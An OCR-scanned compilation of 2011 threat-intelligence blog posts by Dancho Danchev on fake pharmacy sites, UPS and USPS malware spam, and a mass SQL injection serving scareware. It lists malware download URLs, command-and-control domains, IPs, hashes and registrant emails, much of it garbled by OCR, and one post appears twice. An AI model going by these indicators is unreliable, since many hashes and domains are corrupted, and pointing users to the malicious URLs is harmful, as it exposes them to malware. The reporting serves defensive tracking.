
[4] 

The sampled URLs redirect to the following fraudulent 
pharmaceutical sites: 

pillsedonline.com - 93.170.104.53 - Email: 
stavrosl92 9@hotmail.com; 
stavroscomodromos@yahoo.com 

buyperfecthealth.com - 93.170.104.53 - Email: 
stavrosl929@hotmail.com 

safedrugstock.com - 93.170.104.53 - Email: 
stavrosl929@hotmail.com 

securedrugstock.com - 93.170.104.53 - Email: 
stavrosl929@hotmail.com 

europharmas.com - 93.170.104.53 - Email: 
glockner546@hotmail.com 

requestpills.com - 93.170.104.53 - Email: 

stavrosl929@hotmail.com; 

stavroscomodromos@yahoo.com 

online-doc.us - 93.170.104.53 - Email: cool 
_gamer90@mail.ru 

pills4sex.eu - 93.170.104.53 

securetablets.com - 93.170.104.53 - Email: 
stavrosl929@hotmail.com 

alledtablets.com - 93.170.104.53 - Email: 

stavrosl929@hotmail.com; 

stavroscomodromos@yahoo.com 



canadian-refills.com - 178.239.60.214 - Email: privacy- 
82 991 l@domainprivacygroup.com 

Cybercriminals continue purchasing web shells/and stolen 
FTP credentials to high page rank-ed web sites such 

as educational institutions. Monitoring of their operations 
will continue. 
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1600/compromiseduriive 
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Spamvertised United Parcel Service notifications 
serve malware (2011-03-23 15:54) 

[1] 

A currently ongoing spam campaign is impersonating UPS 
for malware-serving purposes. 

Sample subject: United Parcel Service notification 

Sample attachments: UPSnotify.rar; UPSnotify.exe; 
UnitedParcelServicedocument.exe 

Sample message: Dear customer. 

The parcel was sent your home address. And it will arrive 
within 7 business day. More information and the 

tracking number are attached in document below. Thank 
you. © 1994-2011 United Parcel Service of America, Inc. 

Detection rates: 

UnitedParcelServicedocument.exe - [2]Mal/Bredo-K - 
Result: 7/41 (17.1 %) 

MD5 : b60e95b42106989bc39el75efcc031db 

SHA1 : 0fb63dff83db643c9ee42efe617bdd539a5ffb8f 

SHA256: 

65fl4438c3154a74767131a427fbdc50c28a6cbcdcf47f3d4 
18b92c4cl68696a 

UPS notify.exe - [3]Mal/Bredo-K - Result: 17/ 40 (42.5 %) 
MD5 : Cc040e69121bcl9f23ef4a32dbb8a80e 



SHA1 : da65b7b277540b88918076949a28e8307ad7e41a 


SHA256: 

ef5f76elb20c2083469fbe7e4de4ec9c06689eel05274bla7 

9c9cadbd23d54ae 

Upon execution downloads additional binaries from: 

193.105.121.33/lol2.exe 
193.105.121.33/pod. exe 
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193.105.121.33/spm.exe 

Responding to 193.105.121.33 are undeardarling.com - 

Email: admin@undearhappydear.com and undearhap- 

pydear.com - Email: admin@undearhappydear.com 
Detection rates: 

lol2.exe - [4]Trojan.FakeAV!gen39- Result: 14/ 43 (32.6 
%) 

MD5 : 747431a2a4a29flbfcl36e674af99ad0 

SHA1 : 8349fc3f5f299d0ca6473e748276ec2b50019330 

SHA256: 

6009e7f5cbc55e6acb060d9fb33a39a978168a32a0a8c6a24 

f201106056cc0db 

pod.exe - [5]Backdoor.Win32.GbotMK - Result: 33/ 42 
(78.6 %) 

MD5 : f403afdbe4c4c859c8ab018a7ded694c 



SHA1 : 1915a46cbb43fcaf8da90af95856d7524b24fl29 
SHA256: 

eddfff99df316669191be0b61a5ae06ee811bbd27110111e6 

9cbd212881fa494 

Upon execution phones back to: 

healthylifenow.com - 208.109.223.193 - Email: 
HEALTHYLIFENOW.COM@doma insbyproxy.com 

bigbeerclubonline.com - Email: 
contact@privacyprotect.org 

zonetf.com - 96.9.169.85 - Email: janeob@126.com 
spm.exe - [6]W32.Pilleuz - 10/ 42 (23.8 %) 

MD5 : de55498b9f9195fl733df62c7026cf5f 

SHA1 : 5520cl220cdd03a64f9b782c2393697ebabl54b9 

SHA256: 

dc2a797e5be968f9d36d4510988fa242c042a3e315fb50a3f 

9325cae6ald779d 

Upon execution phones back to: 

ponel.biz - 46.4.62.17 - Email: web _raskrutka@pochta.ru 

itisformebaby.biz -46.4.10.7; 88.198.46.151; 
178.63.63.208 - Email: web _raskrutka@pochta.ru 

gmail.com 

yahoo.com 


hotmail.com 



As speculated, cybercriminals have started feeding 
legitimate sites into their C &C communication patterns in 

an attempt to undermine community efforts aimed at 
tracking their malicious activities. 

Related posts: 

[7] Spamvertised FedEx Notifications Spread Malware 

[8] Spamvertised DHL Notification Malware Campaign 

[9] More Spamvertised DHL Notifications Spread 
Malware 

This post has been reproduced from [lOJDancho 
Danchev's blog. 

1. https://lh3. a oo a leusercontent.com/-O aa Zi8- 

vi HU/TYn2AwAWs6l/AAAAAAAAE20/Ct8GpwYkPkU/sl600/u 

ps-lo ao.ipg 


2 . 

http://www.virustotal.com/file-scan/report.html? 

id = 65fl4438c3154a74767131a427fbdc50c28a6cbcdcf47f3 

d418b92 

c4c!68696a-13QQ98354Q 

3. 

http://www.virustotal.com/file-scan/report.html? 

id = ef5f76elb20c2Q83469fbe7e4de4ec9cQ6689eelQ5274b 

Ia79c9ca 


dbd23d54ae-l 300884778 


















4. 


http://www.virustotal.com/file-scan/report.html? 

[d = 6Q09e7f5cbc55e6acb060d9fb33a39a978168a32a0a8c6 

a24f2011 

Q6Q56ccQdb-13QQ884822 

5. 

http://www.virustotal.com/file-scan/reoort.html? 

id=eddfff99df316669191be0b61a5aeQ6ee811bbd2711011 

Ie69cbd2 
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12881fa494-13Q0884591 

6 . 

http://www.virustotal.com/file-scan/report.html? 

id = dc2a797e5be968f9d36d451Q988fa242cQ42a3e315fb50 

a3f9325c 

ae6aId779d-l300884605 

7. http://ddanchev.blo as pot.com/2011/Q3/spamvertised- 
fedex-notifications-spread.html 

8. http://ddanchev.blo as pot.com/2011/Q3/spamvertised-dhl- 
notifidcation-malware.html 

9. http://ddanchev.blo as pot.com/2011/Q3/more- 
s pamvertised-dhl-notifications.html 

10. http://ddanchev.blo as pot.com/ 
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Spamvertised Post Office Express Mail (USPS) Emails 
Serving Malware (2011-03-25 18:20) 

[1] 

A currently spamvertised malware campaign is 
impersonating the USPS for malware-serving purposes. 

Sample subject: Post Express Information. Your package is 
available for pick up. NR[random number] 

Sample attachment: Post _Express _Label _ID _[random 
number].zip; Post_Express _Label.exe 

Sample message: 

Dear client, Email notice number.frandom number]. Your 
package has been returned to the Post Express office. 

The reason of the return is "Error in the delivery address" 
Important message! Attached to the letter mailing label 
contains the details of the package delivery. You have to 
print mailing label, and come in the Post Express office in 
order to receive the packages! Thank you for using our 
services. Post Express Support. 

Detection rate: 

Post _Express _l_abel.exe - [2]Medium Risk Malware 
Dropper - Result: 1/ 41 (2.4 %) 

MD5 : 3c05dd68ee0bfb9b290b9c034f836833 


SHA1 :8ala00da04c96c8e67b9921652de60463118ea9f 


SHA256: 

57d58165c79158a42c3e45670aa4176aaae393f371188f91 

d0ac46022bd3e7c0 

[3] 
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Upon execution phones back to: 

mialepromo.ru/7Pe80Rolxs/document.doc 

mialepromo.ru/7Pe8ORolxs/load.php?file=0 

mialepromo.ru/7Pe80Rolxs/load.php?file=l 

mialepromo.ru/7Pe80Rolxs/load.php?file=2 

mialepromo.ru/7Pe80Rolxs/load.php?file=3 

mialepromo.ru/7Pe80Rolxs/load.php?file=4 

mialepromo.ru/7Pe80Rolxs/load.php?file=5 

mialepromo.ru/7Pe80Rolxs/load.php?file=6 

mialepromo.ru/7Pe80Rolxs/load.php?file=7 

mialepromo.ru/7Pe80Rolxs/load.php?file=8 

mialepromo.ru/7Pe80Rolxs/load.php?file=9 

mialepromo.ru/7Pe80Rolxs/load.php?file=uploader 

mialepromo.ru/7Pe80Rolxs/load.php?file=grabbers 


mialepromo.ru - 89.208.149.204 (AS12695); 
109.94.220.51 (AS47860); 109.94.220.50 (AS47860); 
91.199.75.77 

(AS44301) 178.17.164.131 (AS43289) 193.22.81.104 
(AS28920) - Email: salam(g)ica.org 

Monitoring of the campaign is ongoing. 

Related posts: 

[4] Spamvertised United Parcel Service notifications 
serve malware 

[5] Spamvertised FedEx Notifications Spread Malware 
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[6] Spamvertised DHL Notification Malware Campaign 

[7] More Spamvertised DHL Notifications Spread 
Malware 

This post has been reproduced from [8]Dane ho 
Danchev's blog. 
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f91d0ac46 
















022bd3e7c0-1301066754 
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erv 
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s pamvertised-dhl-notifications.html 

8. http://ddanchev.blo as pot.com/ 
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Dissecting the Massive SQL Injection Attack Serving 
Scareware (2011-03-31 19:54) 

A currently ongoing massive SQL injection attack has 
affected hundreds of thousands of web pages across the 
Web, 

to ultimately monetize the campaign through a scareware 
affiliate program. Such massive SQL injection attempts are 

usually conducted using [ljmass vulnerability scanning 

tools, with the help of [2]search engines which have 






























already 

[3]crawled the vulnerable sites. 

What's particularly interesting about this campaign, is the 
fact that the used domains are all responding to 

the same IPs, including the portfolios of scareware domains, 
which the cybercriminals naturally rotate on a periodic 

basis. Let's dissect the campaign, expose the domain 
portfolios and the entire campaign structure. 

UPDATED: Related SQL injected URLs [4]courtsesy of 
WebSense: 

online-stats201.info/ur.php - Email: tik0066@gmail.com 

stats-masterlll.info/ur.php - Email: 
tik0066@gmail.com 

agasi-story.info/ur.php - 91.217.162.45 - Email: 
tik0066@gmail.com 

general-st.info/ur.php - Email: tik0066@gmail.com 
extra-service.info/ur.php - Email: tik0066@gmail.com 
sol-stats.info/ur.php - Email: tik0066@gmail.com 

google-stats49.info/ur.php - Email: tik0066@gmail.com 
google-stats45.info/ur.php - Email: tik0066@gmail.com 
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google-stats50.info/ur.php - Email: tik0066@gmail.com 


google-server43.info/ur.php - Email: tik0066@gmail.com 

stats-master88.info/ur.php - Email: tik0066@gmail.com 

eva-marine.info/ur.php - 109.236.81.28 - Email: 
tik0066@gmail.com 

stats-master99.info/ur.php - Email: tik0066@gmail.com 

tzv-stats.info/ur.php - Email: tik0066@gmail.com 

milapop.com/ur.php - Email: 
jamesnorthone@hotmailbox.com 

SQL injected URLs: 

lizamoon.com/ur.php ( 67,500 results) - 91.220.35.151 
(AS3721); 91.213.29.182 (AS51786); 95.64.9.18 (AS50244) 


Email: jamesnorthone@hotmailbox.com 

alexblane.com/ur.php ( 3,920 results) - Email: 
jamesnorthone@hotmailbox.com 

alisa-carter.com/ur.php ( 220,000 results) - Email: 
jamesnorthone@hotmailbox.com 

alexblane.com/ur.php ( 3,920 results) - Email: 
jamesnorthone@hotmailbox.com 

t6ryt56.info/ur.php ( 18 results) - Email: support@ruler- 
domains.com 


tadygus.com/ur.php ( 100 results) - Email: 
jamesnorthone@hotmailbox.com 



worid-of-books.com/ur.php ( 334,000 results) - Email: 
tik0066@g mail, com 

Upon successful redirection, the campaign attempts to load 
the scareware domains defender-nibea.in/scanlb/237 - 

46.252.130.200 - Email: jimwei2969@gmail.com 

Detection rate: 

freesystemscan.exe - [5]Trojan/Win32.FakeAV - Result: 9/ 
41 (22.0 %) 

MD5 : 815d77f8fca509ddelabeafabed30b65 

SHA1 : Ib3c35afb76c53cd9507fffee46fb58c29e72bcl 
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SHA256: 

Cd902b92042435c2d70d4bf59acc2de8229bfc367626961f7 

6c03f75dcd7e95c 

Responding to 46.252.130.200 (AS25190; KIS-AS UAB 
"Kauno Interneto Sistemos") are also: 

antivirus-1091.co.cc 

antivirus-1574.co.cc 

a nti virus-2051, co. cc 

antivirus-2525.co.cc 

a nti virus-2932, co. cc 


antivirus-3654.co.cc 



antivirus-3833.co.cc 


antivirus-4063.co.cc 

antivirus-418.co.cc 

anti virus-4303, co. cc 

antivirus-4749.co.cc 

anti virus-495, co. cc 

antivirus-5216.co.cc 

anti virus-5676, co. cc 

antivirus-5802.co.cc 

anti virus-6437, co. cc 

antivirus-6703.co.cc 

a nti virus-7081, co. cc 

antivirus-713.co.cc 

antivirus-728.co.cc 

antivirus-7357.co.cc 

a nti virus-8072, co. cc 

antivirus-9009.co.cc 

a nti virus-9638, co. cc 

antivirus-9667.co.cc 

defender-aabv.in - Email 


leonflanagan7681@gmail.com 



defender-aqeu.co.cc 

defender-asng.co.cc 

defender-atio.in - Email: terriduverger3239@gmail.com 
defender-atxo.in - Email: celineiebba9266@gmail.com 
defender-bcvs.in - Email: martinefinklea5375@gmail.com 

defender-bwuy.co.cc 

defender-cron.in - Email: Iisasuresh9147@gmail.com 

defender-ddbr.in - Email: 
selenajohansson9195@gmail.com 

defender-dteo.in - Email: 
giovannaraggio5417@gmail.com 

defender-eahy.co.cc 

defender-eklq.in - Email: 
sebastiensheppard8680@gmail.com 

defender-endl.in - Email: adamgaylardlll3@gmail.com 

defender-ewum.co.cc 

defender-eyde.co.cc 

defender-fmof.in - Email: kamillamartinl237@gmail.com 

defender-fola.co.cc 

defender-gnva.in - Email: ananddaher7294@gmail.com 
defender-grit.in - Email: anthonygaylard9887@gmail.com 
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defender-hipw.in - Email: angiejohansen9730@gmail.com 

defender-hjlk.in - Email: jennwrayford2124@gmail.com 

defender-hmfu.in - Email: Iynnbone8026@gmail.com 

defender-hsug.in - Email: 
moniquetkarnopp3596@gmail.com 

defender-htlu.in - Email: jerihamann4163@gmail.com 

defender-iibk.co.cc 

defender-iies.co.cc 

defender-iksl.in - Email: amarasanders9974@gmail.com 

defender-isde.co.cc 

defender-iyrc.co.cc 

defender-jgnl.in - Email: caseyalzen3316@gmail.com 

defender-jihv.co.cc 

defender-keod.in - Email: 
khashayarbirss4814@gmail.com 

defender-kuts.in - Email: rogerfrancis3322@gmail.com 
defender-kwwh.in - Email: tobyboisseau6505@gmail.com 

defender-kzwu.co.cc 
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defender-labm.in - Email: 
gregory brad ford 15 20@gmail.com 

defender-lcoh.in - Email: timothythomas6924@gmail.com 

defender-nhei.co.cc 

defender-nrpr.in - Email: burtonalba8156@gmail.com 

defender-ojbr.in - Email: fucknielsen8675@gmail.com 

defender-osbi.in - Email: fidelslattum2159@gmail.com 

defender-pakc.in - Email: 
sabrinawheelock7642@gmail.com 

defender-ppdw.in - Email: 
divinakempton5670@gmail.com 

defender-qfdx.in - Email: 
hokyeongyancey6369@gmail.com 

defender-qotg.in - Email: franchescaili9704@gmail.com 
defender-qpwo.in - Email: carlaadams@gmail.com 

defender-qsko.co.cc 

defender-qumf.in - Email: carlaadams@gmail.com 

defender-rlag.in - Email: carmichaelmail@gmail.com 

defender-rrin.in - Email: 
kevincharoenset5321@gmail.com 

defender-thga.in - Email: youngantonio6055@gmail.com 


defender-ueuv.co.cc 



defender-uqko.in - Email: 
christinakaaikati5574@gmail.com 

defender-vflq.in - Email: terriacuna2081@gmail.com 

defender-vlmj.in - Email: Iauriefreeman9930@gmail.com 

defender-vqqn.in - Email: chrisjames4421@gmail.com 

defender-vxgh.in - Email: griseldavelez5369@gmail.com 

defender-wkiw.in - Email: otisvaladez7778@gmail.com 

defender-wqga.in - Email: 
christodoulosglidden8856@gmail.com 

defender-wrhw.in - Email: bradsureshl406@gmail.com 

defender-wtln.co.cc 

defender-xcre.in - Email: pavelmayer4891@gmail.com 
defender-xnnx.in - Email: pavelmayer4891@gmail.com 

defender-ykym.co.cc 

movie-iirg.in - Email: misslynn8546@gmail.com 
movie-pblv.in - Email: judgewright4021@gmail.com 

movies-live-tube-jeyq.co.cc 

movie-tkhk.in - Email: terrymeallyl288@gmail.com 

movie-tube-beym.co.cc 

movie-tube-juie.co.cc 

movie-ueep.in - Email: celinekevin6179@gmail.com 



movieway2011.com - Email: contact@privacyprotect.org 
movie-xbtb.in - Email: sanfordross9242@gmail.com 
movie-xxnl.in - Email: ianbalitsaris3201@gmail.com 
softway2011.com - Email: contact@privacyprotect.org 

system-scanner-boep.co.cc 

system-sea nner-eill. co. cc 

system-scanner-eopa.co.cc 

system-scanner-ewqq.co.cc 

system-scanner-iaap.co.cc 

system-scanner-ieyx.co.cc 

system-scanner-lcyo.co.cc 

system-scanner-ouny.co.cc 

system-scanner-oypx.co.cc 

system-scanner-qeap.co.cc 
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system-scanner-racv.co.cc 

system-scanner-ryes.co.cc 

system-scanner-tzii.co.cc 

system-scanner-uemo.co.cc 

system-scanner-uotu.co.cc 



system-scanner-uyxt.co.cc 
system-scanner-vpoo.co.cc 
system-scanner-xtoi.co.cc 
sy ste m-sea n ne r-y oyx. co. cc 
system-scanner-ytut.co.cc 

Rotated scareware domains involved in the campaign, 
responding to 84.123.115.228 (AS6739; ONO-AS Ca- 

bleuropa - ONO): 

defender-thga.in - Email: youngantonio6055@gmail.com 

defender-wqga.in - Email: 
christodoulosglidden8856@gmail.com 

defender-gnva.in - Email: ananddaher7294@gmail.com 

defender-rlob.in - Email: 
vasikaranfreudenburg2690@gmail.com 

defender-abcc.in - Email: rubysmart5057@gmail.com 

defender-pakc.in - Email: 
sabrinawheelock7642@gmail.com 

defender-keod.in - Email: 
khashayarbirss4814@gmail.com 

defender-xcre.in - Email: pavelmayer4891@gmail.com 
defender-qumf.in - Email: rachelalbal891@gmail.com 
defender-fmof.in - Email: kamillamartinl237@gmail.com 



defender-uvag.in - Email: espenkeck7682@gmail.com 

defender-hsug.in - Email: 
moniquetkarnopp3596@gmail.com 

defender-vxgh.in - Email: griseldavelez5369@gmail.com 

defender-lcoh.in - Email: timothythomas6924@gmail.com 

defender-kwwh.in - Email: tobyboisseau6505@gmail.com 

defender-osbi.in - Email: fidelslattum2159@gmail.com 

defender-wbui.in - Email: 
carlosbuntschul238@gmail.com 

defender-vlmj.in - Email: Iauriefreeman9930@gmail.com 

defender-hjlk.in - Email: Iauriefreeman9930@gmail.com 

defender-endl.in - Email: adamgaylardlll3@gmail.com 

defender-jgnl.in - Email: caseyalzen3316@gmail.com 

defender-iksl.in - Email: marasanders9974@gmail.com 

defender-labm.in - Email: 
gregorybradfordl520@gmail.com 

defender-rrin.in - Email: 
kevincharoenset5321@gmail.com 

defender-sxin.in - Email: 
taloupavlinovich7166@gmail.com 

defender-cron.in - Email: Iisasuresh9147@gmail.com 

defender-vqqn.in - Email: chrisjames4421@gmail.com 



defender-dteo.in - Email: 
giovannaraggio5417@gmail.com 

defender-uqko.in - Email: 
christinakaaikati5574@gmail.com 

defender-qpwo.in - Email: carlaadams@gmail.com 

defender-atxo.in - Email: celineiebba9266@gmail.com 

defender-rlfp.in - Email: 
Iatanyamuscatell9507@gmail.com 

defender-vflq.in - Email: terriacuna2081@gmail.com 

defender-eklq.in - Email: 
sebastiensheppard8680@gmail.com 

defender-ddbr.in - Email: 
selenajohansson9195@gmail.com 

defender-ojbr.in - Email: fucknielsen8675@gmail.com 

defender-drnr.in - Email: 
sumanvcasquez2008@gmail.com 
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defender-nrpr.in - Email: burtonalba8156@gmail.com 
defender-kuts.in - Email: rogerfrancis3322@gmail.com 
defender-bcvs.in - Email: martinefinklea5375@gmail.com 
defender-grit.in - Email: anthonygaylard9887@gmail.com 
defender-hmfu.in - Email: Iynnbone8026@gmail.com 



defender-htlu.in - Email: jerihamann4163@gmail.com 

defender-aabv.in - Email: leonflanagan7681@gmail.com 

defender-ppdw.in - Email: 
divinakempton5670@gmail.com 

defender-wrhw.in - Email: bradsureshl406@gmail.com 

defender-wkiw.in - Email: otisvaladez7778@gmail.com 

defender-hipw.in - Email: angiejohansen9730@gmail.com 

defender-qfdx.in - Email: 
hokyeongyancey6369@gmail.com 



defender-xnnx.in - Email: sylviawulff2140@gmail.com 
defender-xkox.in - Email: ryanmartin7607@gmail.com 

The scareware domains have been registered using 
automatically registered email accounts at Gmail, as a pre¬ 
caution in an attempt to make it harder to expose the 
campaign by using a single email only. 

Monitoring of the campaign is ongoing. 

Related posts: 

• [6]SQL Injection Through Search Engines Reconnaissance 

• [7]Massive SQL Injections Through Search Engine's 
Reconnaissance - Part Two 

• [8]Massive SQL Injection Attacks - the Chinese Way 

• [9]Cybercriminals SQL Inject Cybercrime-friendly Proxies 
Service 

• [10]GoDaddy's Mass WordPress Blogs Compromise Serving 
Scareware 

• [lljDissecting the WordPress Blogs Compromise at 
Network Solutions 

• [12]Yet Another Massive SQL Injection Spotted in the Wild 

• [13]Smells Like a Copycat SQL Injection In the Wild 
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Dissecting the Massive SQL Injection Attack Serving 
Scareware (2011-03-31 19:54) 

A currently ongoing massive SQL injection attack has 
affected hundreds of thousands of web pages across the 
Web, 

to ultimately monetize the campaign through a scareware 
affiliate program. Such massive SQL injection attempts are 

usually conducted using [ljmass vulnerability scanning 

tools, with the help of [2]search engines which have 
already 




































[3]crawled the vulnerable sites. 

What's particularly interesting about this campaign, is the 
fact that the used domains are all responding to 

the same IPs, including the portfolios of scareware domains, 
which the cybercriminals naturally rotate on a periodic 

basis. Let's dissect the campaign, expose the domain 
portfolios and the entire campaign structure. 

UPDATED: Related SQL injected URLs [4]courtsesy of 
WebSense: 

online-stats201.info/ur.php - Email: tik0066@gmail.com 

stats-masterlll.info/ur.php - Email: 
tik0066@gmail.com 

agasi-story.info/ur.php - 91.217.162.45 - Email: 
tik0066@gmail.com 

general-st.info/ur.php - Email: tik0066@gmail.com 
extra-service.info/ur.php - Email: tik0066@gmail.com 
sol-stats.info/ur.php - Email: tik0066@gmail.com 

google-stats49.info/ur.php - Email: tik0066@gmail.com 
google-stats45.info/ur.php - Email: tik0066@gmail.com 
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google-stats50.info/ur.php - Email: tik0066@gmail.com 
google-server43.info/ur.php - Email: tik0066@gmail.com 


stats-master88.info/ur.php - Email: tik0066@gmail.com 


eva-marine.info/ur.php - 109.236.81.28 - Email: 
tik0066@gmail.com 

stats-master99.info/ur.php - Email: tik0066@gmail.com 

tzv-stats.info/ur.php - Email: tik0066@gmail.com 

milapop.com/ur.php - Email: 
jamesnorthone@hotmailbox.com 

SQL injected URLs: 

lizamoon.com/ur.php ( 67,500 results) - 91.220.35.151 
(AS3721); 91.213.29.182 (AS51786); 95.64.9.18 (AS50244) 


Email: jamesnorthone@hotmailbox.com 

alexblane.com/ur.php ( 3,920 results) - Email: 
jamesnorthone@hotmailbox.com 

alisa-carter.com/ur.php ( 220,000 results) - Email: 
jamesnorthone@hotmailbox.com 

alexblane.com/ur.php ( 3,920 results) - Email: 
jamesnorthone@hotmailbox.com 

t6ryt56.info/ur.php ( 18 results) - Email: support@ruler- 
domains.com 

tadygus.com/ur.php ( 100 results) - Email: 
jamesnorthone@hotmailbox.com 

worid-of-books.com/ur.php ( 334,000 results) - Email: 
tik0066@gmail.com 



Upon successful redirection, the campaign attempts to load 
the scareware domains defender-nibea.in/scanlb/237 - 

46.252.130.200 - Email: jimwei2969@gmail.com 

Detection rate: 

freesystemscan.exe - [5]Trojan/Win32.FakeAV - Result: 9/ 
41 (22.0 %) 

MD5 : 815d77f8fca509ddelabeafabed30b65 

SHA1 : Ib3c35afb76c53cd9507fffee46fb58c29e72bcl 
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SHA256: 

Cd902b92042435c2d70d4bf59acc2de8229bfc367626961f7 

6c03f75dcd7e95c 

Responding to 46.252.130.200 (AS25190; KIS-AS UAB 
"Kauno Interneto Sistemos") are also: 

antivirus-1091.co.cc 

antivirus-1574.co.cc 

a nti virus-2051, co. cc 

antivirus-2525.co.cc 

a nti virus-2932, co. cc 

antivirus-3654.co.cc 

a nti virus-3833, co. cc 


antivirus-4063.co.cc 



antivirus-418.co.cc 


antivirus-4303.co.cc 

anti virus-4749, co. cc 

antivirus-495.co.cc 

a nti virus-5216. co. cc 

antivirus-5676.co.cc 

a nti virus-5802, co. cc 

antivirus-6437.co.cc 

a nti virus-6703, co. cc 

antivirus-7081.co.cc 

a nti virus-713. co. cc 

antivirus-728.co.cc 

antivirus-7357.co.cc 

a nti virus-8072, co. cc 

antivirus-9009.co.cc 

a nti virus-9638, co. cc 

antivirus-9667.co.cc 

defender-aabv.in - Email 

defender-aqeu.co.cc 

defender-asng.co.cc 


leonflanagan7681@gmail.com 



defender-atio.in - Email: terriduverger3239@gmail.com 
defender-atxo.in - Email: celineiebba9266@gmail.com 
defender-bcvs.in - Email: martinefinklea5375@gmail.com 

defender-bwuy.co.cc 

defender-cron.in - Email: Iisasuresh9147@gmail.com 

defender-ddbr.in - Email: 
selenajohansson9195@gmail.com 

defender-dteo.in - Email: 
giovannaraggio5417@gmail.com 

defender-eahy.co.cc 

defender-eklq.in - Email: 
sebastiensheppard8680@gmail.com 

defender-endl.in - Email: adamgaylardlll3@gmail.com 

defender-ewum.co.cc 

defender-eyde.co.cc 

defender-fmof.in - Email: kamillamartinl237@gmail.com 

defender-fola.co.cc 

defender-gnva.in - Email: ananddaher7294@gmail.com 
defender-grit.in - Email: anthonygaylard9887@gmail.com 
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defender-hipw.in - Email: angiejohansen9730@gmail.com 

defender-hjlk.in - Email: jennwrayford2124@gmail.com 

defender-hmfu.in - Email: Iynnbone8026@gmail.com 

defender-hsug.in - Email: 
moniquetkarnopp3596@gmail.com 

defender-htlu.in - Email: jerihamann4163@gmail.com 

defender-iibk.co.cc 

defender-iies.co.cc 

defender-iksl.in - Email: amarasanders9974@gmail.com 

defender-isde.co.cc 

defender-iyrc.co.cc 

defender-jgnl.in - Email: caseyalzen3316@gmail.com 

defender-jihv.co.cc 

defender-keod.in - Email: 
khashayarbirss4814@gmail.com 

defender-kuts.in - Email: rogerfrancis3322@gmail.com 
defender-kwwh.in - Email: tobyboisseau6505@gmail.com 

defender-kzwu.co.cc 
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defender-labm.in - Email: 
gregorybradfordl520@gmail.com 



defender-lcoh.in - Email: timothythomas6924@gmail.com 

defender-nhei.co.cc 

defender-nrpr.in - Email: burtonalba8156@gmail.com 

defender-ojbr.in - Email: fucknielsen8675@gmail.com 

defender-osbi.in - Email: fidelslattum2159@gmail.com 

defender-pakc.in - Email: 
sabrinawheelock7642@gmail.com 

defender-ppdw.in - Email: 
divinakempton5670@gmail.com 

defender-qfdx.in - Email: 
hokyeongyancey6369@gmail.com 

defender-qotg.in - Email: franchescaili9704@gmail.com 
defender-qpwo.in - Email: carlaadams@gmail.com 

defender-qsko.co.cc 

defender-qumf.in - Email: carlaadams@gmail.com 

defender-rlag.in - Email: carmichaelmail@gmail.com 

defender-rrin.in - Email: 
kevincharoenset5321@gmail.com 

defender-thga.in - Email: youngantonio6055@gmail.com 

defender-ueuv.co.cc 

defender-uqko.in - Email: 
christinakaaikati5574@gmail.com 



defender-vflq.in - Email: terriacuna2081@gmail.com 

defender-vlmj.in - Email: Iauriefreeman9930@gmail.com 

defender-vqqn.in - Email: chrisjames4421@gmail.com 

defender-vxgh.in - Email: griseldavelez5369@gmail.com 

defender-wkiw.in - Email: otisvaladez7778@gmail.com 

defender-wqga.in - Email: 
christodoulosglidden8856@gmail.com 

defender-wrhw.in - Email: bradsureshl406@gmail.com 

defender-wtln.co.cc 

defender-xcre.in - Email: pavelmayer4891@gmail.com 
defender-xnnx.in - Email: pavelmayer4891@gmail.com 

defender-ykym.co.cc 

movie-iirg.in - Email: misslynn8546@gmail.com 
movie-pblv.in - Email: judgewright4021@gmail.com 

movies-live-tube-jeyq.co.cc 

movie-tkhk.in - Email: terrymeallyl288@gmail.com 

movie-tube-beym.co.cc 

movie-tube-juie.co.cc 

movie-ueep.in - Email: celinekevin6179@gmail.com 
movieway2011.com - Email: contact@privacyprotect.org 



movie-xbtb.in - Email: sanfordross9242@gmail.com 
movie-xxnl.in - Email: ianbalitsaris3201@gmail.com 
softway2011.com - Email: contact@privacyprotect.org 

system-scanner-boep.co.cc 

system-scanner-eill.co.cc 

system-scanner-eopa.co.cc 

system-scanner-ewqq.co.cc 

system-scanner-iaap.co.cc 

system-scanner-ieyx.co.cc 

system-scanner-lcyo.co.cc 

system-scanner-ouny.co.cc 

system-scanner-oypx.co.cc 

system-scanner-qeap.co.cc 
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system-scanner-racv.co.cc 

system-scanner-ryes. co. cc 

system-scanner-tzii.co.cc 

system-scanner-uemo.co.cc 

system-scanner-uotu.co.cc 

system-scanner-uyxt.co.cc 



system-scanner-vpoo.co.cc 
system-scanner-xtoi.co.cc 
sy ste m-sea n ne r-y oyx. co. cc 
system-scanner-ytut.co.cc 

Rotated scareware domains involved in the campaign, 
responding to 84.123.115.228 (AS6739; ONO-AS Ca- 

bleuropa - ONO): 

defender-thga.in - Email: youngantonio6055@gmail.com 

defender-wqga.in - Email: 
christodoulosglidden8856@gmail.com 

defender-gnva.in - Email: ananddaher7294@gmail.com 

defender-rlob.in - Email: 
vasikaranfreudenburg2690@gmail.com 

defender-abcc.in - Email: rubysmart5057@gmail.com 

defender-pakc.in - Email: 
sabrinawheelock7642@gmail.com 

defender-keod.in - Email: 
khashayarbirss4814@gmail.com 

defender-xcre.in - Email: pavelmayer4891@gmail.com 
defender-qumf.in - Email: rachelalbal891@gmail.com 
defender-fmof.in - Email: kamillamartinl237@gmail.com 
defender-uvag.in - Email: espenkeck7682@gmail.com 



defender-hsug.in - Email: 
moniquetkarnopp3596@g mail, com 

defender-vxgh.in - Email: griseldavelez5369@gmail.com 

defender-lcoh.in - Email: timothythomas6924@gmail.com 

defender-kwwh.in - Email: tobyboisseau6505@gmail.com 

defender-osbi.in - Email: fidelslattum2159@gmail.com 

defender-wbui.in - Email: 
carlosbuntschul238@gmail.com 

defender-vlmj.in - Email: Iauriefreeman9930@gmail.com 

defender-hjlk.in - Email: Iauriefreeman9930@gmail.com 

defender-endl.in - Email: adamgaylardlll3@gmail.com 

defender-jgnl.in - Email: caseyalzen3316@gmail.com 

defender-iksl.in - Email: marasanders9974@gmail.com 

defender-labm.in - Email: 
gregorybradfordl520@gmail.com 

defender-rrin.in - Email: 
kevincharoenset5321@gmail.com 

defender-sxin.in - Email: 
taloupavlinovich7166@gmail.com 

defender-cron.in - Email: Iisasuresh9147@gmail.com 

defender-vqqn.in - Email: chrisjames4421@gmail.com 



defender-dteo.in - Email: 
giovannaraggio5417@gmail.com 

defender-uqko.in - Email: 
christinakaaikati5574@gmail.com 

defender-qpwo.in - Email: carlaadams@gmail.com 

defender-atxo.in - Email: celineiebba9266@gmail.com 

defender-rlfp.in - Email: 
Iatanyamuscatell9507@gmail.com 

defender-vflq.in - Email: terriacuna2081@gmail.com 

defender-eklq.in - Email: 
sebastiensheppard8680@gmail.com 

defender-ddbr.in - Email: 
selenajohansson9195@gmail.com 

